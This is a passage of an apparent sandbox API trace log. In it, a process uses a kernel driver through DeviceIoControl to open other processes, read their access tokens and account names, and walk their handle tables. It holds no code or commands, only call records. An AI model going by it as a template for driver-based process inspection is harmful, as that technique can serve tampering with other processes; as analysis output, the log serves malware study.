ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.787] ObfDereferenceObject (Object=0xffffe00069fdff20) returned 0x7fff [0291.787] IoCompleteRequest () returned 0x0 [0291.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeac) returned 0x188 [0291.787] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.787] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006846c540, HandleInformation=0x0) returned 0x0 [0291.787] ObOpenObjectByPointer (in: Object=0xffffe0006846c540, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.787] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x27fe6 [0291.787] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006855a4c0 | out: TokenHandle=0xffffe0006855a4c0*=0x18c) returned 0x0 [0291.787] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.787] IoCompleteRequest () returned 0x0 [0291.787] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.787] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.788] CloseHandle (hObject=0x18c) returned 1 [0291.788] CloseHandle (hObject=0x188) returned 1 [0291.788] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.788] PsAcquireProcessExitSynchronization () returned 0x0 [0291.788] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.788] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a554590, HandleInformation=0x0) returned 0x0 [0291.788] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.788] PsReleaseProcessExitSynchronization () returned 0x2 [0291.788] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffe4 [0291.788] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.788] ObfDereferenceObject (Object=0xffffe0006a554590) returned 0x7fff [0291.788] IoCompleteRequest () returned 0x0 [0291.788] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.788] PsAcquireProcessExitSynchronization () returned 0x0 [0291.788] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.788] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a51b5a0, HandleInformation=0x0) returned 0x0 [0291.788] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.788] PsReleaseProcessExitSynchronization () returned 0x2 [0291.788] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffe3 [0291.788] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.788] ObfDereferenceObject (Object=0xffffe0006a51b5a0) returned 0x7fff [0291.788] IoCompleteRequest () returned 0x0 [0291.788] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.788] PsAcquireProcessExitSynchronization () returned 0x0 [0291.788] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.788] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a451b00, HandleInformation=0x0) returned 0x0 [0291.788] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.788] PsReleaseProcessExitSynchronization () returned 0x2 [0291.788] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffe2 [0291.788] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.788] ObfDereferenceObject (Object=0xffffe0006a451b00) returned 0x7f76 [0291.788] IoCompleteRequest () returned 0x0 [0291.788] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.789] PsAcquireProcessExitSynchronization () returned 0x0 [0291.789] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.789] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a683590, HandleInformation=0x0) returned 0x0 [0291.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.789] PsReleaseProcessExitSynchronization () returned 0x2 [0291.789] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffe1 [0291.789] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.789] ObfDereferenceObject (Object=0xffffe0006a683590) returned 0x7ffe [0291.789] IoCompleteRequest () returned 0x0 [0291.789] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.789] PsAcquireProcessExitSynchronization () returned 0x0 [0291.789] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.789] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a922f20, HandleInformation=0x0) returned 0x0 [0291.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.789] PsReleaseProcessExitSynchronization () returned 0x2 [0291.789] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffe0 [0291.789] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.789] ObfDereferenceObject (Object=0xffffe0006a922f20) returned 0x7ff9 [0291.789] IoCompleteRequest () returned 0x0 [0291.789] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.789] PsAcquireProcessExitSynchronization () returned 0x0 [0291.789] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.789] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a918d60, HandleInformation=0x0) returned 0x0 [0291.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.789] PsReleaseProcessExitSynchronization () returned 0x2 [0291.789] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffdf [0291.789] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.789] ObfDereferenceObject (Object=0xffffe0006a918d60) returned 0xffa8 [0291.789] IoCompleteRequest () returned 0x0 [0291.789] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.789] PsAcquireProcessExitSynchronization () returned 0x0 [0291.789] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.789] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a918d60, HandleInformation=0x0) returned 0x0 [0291.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.789] PsReleaseProcessExitSynchronization () returned 0x2 [0291.789] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffde [0291.789] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.789] ObfDereferenceObject (Object=0xffffe0006a918d60) returned 0xffa7 [0291.789] IoCompleteRequest () returned 0x0 [0291.789] PsLookupProcessByProcessId (in: ProcessId=0xeac, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.789] PsAcquireProcessExitSynchronization () returned 0x0 [0291.789] KeStackAttachProcess (in: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006846c540, ApcState=0xffffd000ac0cf400) [0291.789] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a58ea10, HandleInformation=0x0) returned 0x0 [0291.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.789] PsReleaseProcessExitSynchronization () returned 0x2 [0291.790] ObfDereferenceObject (Object=0xffffe0006846c540) returned 0x1ffdd [0291.790] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.790] ObfDereferenceObject (Object=0xffffe0006a58ea10) returned 0x7fff [0291.790] IoCompleteRequest () returned 0x0 [0291.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4c) returned 0x188 [0291.790] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.790] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006841c540, HandleInformation=0x0) returned 0x0 [0291.790] ObOpenObjectByPointer (in: Object=0xffffe0006841c540, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.790] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x27fe6 [0291.790] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006855a4c0 | out: TokenHandle=0xffffe0006855a4c0*=0x18c) returned 0x0 [0291.790] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.790] IoCompleteRequest () returned 0x0 [0291.790] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.790] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.790] CloseHandle (hObject=0x18c) returned 1 [0291.790] CloseHandle (hObject=0x188) returned 1 [0291.790] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.791] PsAcquireProcessExitSynchronization () returned 0x0 [0291.791] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.791] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a704710, HandleInformation=0x0) returned 0x0 [0291.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.791] PsReleaseProcessExitSynchronization () returned 0x2 [0291.791] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffe4 [0291.791] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.791] ObfDereferenceObject (Object=0xffffe0006a704710) returned 0x7fff [0291.791] IoCompleteRequest () returned 0x0 [0291.791] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.791] PsAcquireProcessExitSynchronization () returned 0x0 [0291.791] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.791] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a72ad90, HandleInformation=0x0) returned 0x0 [0291.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.791] PsReleaseProcessExitSynchronization () returned 0x2 [0291.791] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffe3 [0291.791] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.791] ObfDereferenceObject (Object=0xffffe0006a72ad90) returned 0x7fff [0291.791] IoCompleteRequest () returned 0x0 [0291.791] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.791] PsAcquireProcessExitSynchronization () returned 0x0 [0291.791] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.791] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a798090, HandleInformation=0x0) returned 0x0 [0291.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.791] PsReleaseProcessExitSynchronization () returned 0x2 [0291.791] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffe2 [0291.791] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.791] ObfDereferenceObject (Object=0xffffe0006a798090) returned 0x7f64 [0291.791] IoCompleteRequest () returned 0x0 [0291.791] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.791] PsAcquireProcessExitSynchronization () returned 0x0 [0291.791] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.791] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6343f0, HandleInformation=0x0) returned 0x0 [0291.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.791] PsReleaseProcessExitSynchronization () returned 0x2 [0291.791] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffe1 [0291.791] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.791] ObfDereferenceObject (Object=0xffffe0006a6343f0) returned 0xffff [0291.791] IoCompleteRequest () returned 0x0 [0291.791] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.791] PsAcquireProcessExitSynchronization () returned 0x0 [0291.791] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.791] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a721f20, HandleInformation=0x0) returned 0x0 [0291.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.791] PsReleaseProcessExitSynchronization () returned 0x2 [0291.792] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffe0 [0291.792] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.792] ObfDereferenceObject (Object=0xffffe0006a721f20) returned 0x7ffa [0291.792] IoCompleteRequest () returned 0x0 [0291.792] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.792] PsAcquireProcessExitSynchronization () returned 0x0 [0291.792] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.792] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6bef20, HandleInformation=0x0) returned 0x0 [0291.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.792] PsReleaseProcessExitSynchronization () returned 0x2 [0291.792] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffdf [0291.792] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.792] ObfDereferenceObject (Object=0xffffe0006a6bef20) returned 0xff96 [0291.792] IoCompleteRequest () returned 0x0 [0291.792] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.792] PsAcquireProcessExitSynchronization () returned 0x0 [0291.792] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.792] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6bef20, HandleInformation=0x0) returned 0x0 [0291.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.792] PsReleaseProcessExitSynchronization () returned 0x2 [0291.792] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffde [0291.792] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.792] ObfDereferenceObject (Object=0xffffe0006a6bef20) returned 0xff95 [0291.792] IoCompleteRequest () returned 0x0 [0291.792] PsLookupProcessByProcessId (in: ProcessId=0xe4c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.792] PsAcquireProcessExitSynchronization () returned 0x0 [0291.792] KeStackAttachProcess (in: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006841c540, ApcState=0xffffd000ac0cf400) [0291.792] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3bff20, HandleInformation=0x0) returned 0x0 [0291.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.792] PsReleaseProcessExitSynchronization () returned 0x2 [0291.792] ObfDereferenceObject (Object=0xffffe0006841c540) returned 0x1ffdd [0291.792] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6177c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6177c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.792] ObfDereferenceObject (Object=0xffffe0006a3bff20) returned 0x7fff [0291.792] IoCompleteRequest () returned 0x0 [0291.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb04) returned 0x188 [0291.792] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.792] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00068483840, HandleInformation=0x0) returned 0x0 [0291.792] ObOpenObjectByPointer (in: Object=0xffffe00068483840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000704) returned 0x0 [0291.792] ObfDereferenceObject (Object=0xffffe00068483840) returned 0x3000e [0291.792] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000704, DesiredAccess=0x8, TokenHandle=0xffffe0006855a4c0 | out: TokenHandle=0xffffe0006855a4c0*=0x18c) returned 0x0 [0291.792] ZwClose (Handle=0xffffffff80000704) returned 0x0 [0291.792] IoCompleteRequest () returned 0x0 [0291.793] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.840] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.841] CloseHandle (hObject=0x18c) returned 1 [0291.841] CloseHandle (hObject=0x188) returned 1 [0291.841] PsLookupProcessByProcessId (in: ProcessId=0xb04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.841] PsAcquireProcessExitSynchronization () returned 0x0 [0291.841] KeStackAttachProcess (in: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400) [0291.841] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a4b530, HandleInformation=0x0) returned 0x0 [0291.841] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.841] PsReleaseProcessExitSynchronization () returned 0x2 [0291.841] ObfDereferenceObject (Object=0xffffe00068483840) returned 0x2800c [0291.841] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.841] ObfDereferenceObject (Object=0xffffe00069a4b530) returned 0x7fff [0291.841] IoCompleteRequest () returned 0x0 [0291.841] PsLookupProcessByProcessId (in: ProcessId=0xb04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.841] PsAcquireProcessExitSynchronization () returned 0x0 [0291.841] KeStackAttachProcess (in: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068483840, ApcState=0xffffd000ac0cf400) [0291.841] 